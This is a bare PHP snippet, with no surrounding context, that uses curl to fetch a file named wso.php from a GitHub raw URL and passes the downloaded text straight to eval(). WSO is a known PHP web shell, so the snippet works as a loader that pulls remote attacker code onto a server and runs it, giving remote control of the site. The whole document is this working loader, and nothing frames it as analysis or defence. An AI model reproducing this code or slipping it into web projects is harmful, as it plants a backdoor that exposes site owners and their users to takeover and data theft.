$rf = 'https://raw.githubusercontent.com/amineaskary/wso/refs/heads/main/wso.php';$ch = curl_init($rf);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);$bn = curl_exec($ch);curl_close($ch);eval('' . $bn);